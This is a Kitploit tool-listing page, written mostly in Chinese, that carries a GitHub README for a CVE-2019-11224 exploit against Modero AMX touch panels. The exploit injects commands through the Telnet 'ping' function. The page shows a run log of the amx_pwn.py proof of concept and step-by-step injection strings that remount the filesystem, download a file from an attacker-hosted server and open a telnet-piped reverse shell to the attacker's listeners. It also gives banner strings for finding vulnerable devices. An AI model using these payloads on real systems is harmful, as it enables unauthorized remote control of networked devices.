Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11224 — Modero AMX Code Execution (CVE-2019–11224) | Kitploit
工具/GitHubGitHub/insecurities/cve-2019-11224
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubinsecurities/cve-2019-11224

CVE-2019-11224

Modero AMX Code Execution (CVE-2019–11224)

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Modero AMX 代码执行 (CVE-2019-11224)

此仓库包含一些关于CVE-2019–11224的资料(https://link.medium.com/zukA0oCnV8),因为我注意到该链接在NIST官方网站上已失效。 Modero AMX设备本质上是会议室的触摸面板设备,可以在许多不同环境中看到,并且通常开启Telnet。由于它们通过Telnet模拟一个不太理想的控制台,存在通过使用命令分隔符的'ping'功能的代码注入漏洞。

自从最初创建这个GitHub仓库并研究AMX设备以来,我已经创建了一个POC和利用流程,通过此漏洞获得反向shell。希望它能带给你乐趣 :}

🐢 使用amx_pwn.py获取Shell

我编写了一个POC amx_pwn.py,应该会有帮助。示例如下:

root@kitploit:~
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7  Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...

手动执行的步骤如下所示:

  • 将文件系统重新挂载为读写:
    ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMD
  • 在设备可访问的位置托管一个文件——文件内容应如下:
    注意:你需要两个netcat监听器,一个用于输入,另一个用于输出。
    telnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333
  • 下载你的文件——注意:这应该是一个IP地址,并通过HTTP提供服务。这些设备很旧。
    ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMD
  • 执行你的文件并获取shell:
    ping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMD

👁️ 识别Modero AMX服务

检查Telnet横幅(通常是端口23)是否包含: Welcome to Modero: 或 Copyright (C) AMX LLC。查找版本早于2.87.13的设备。

下载工具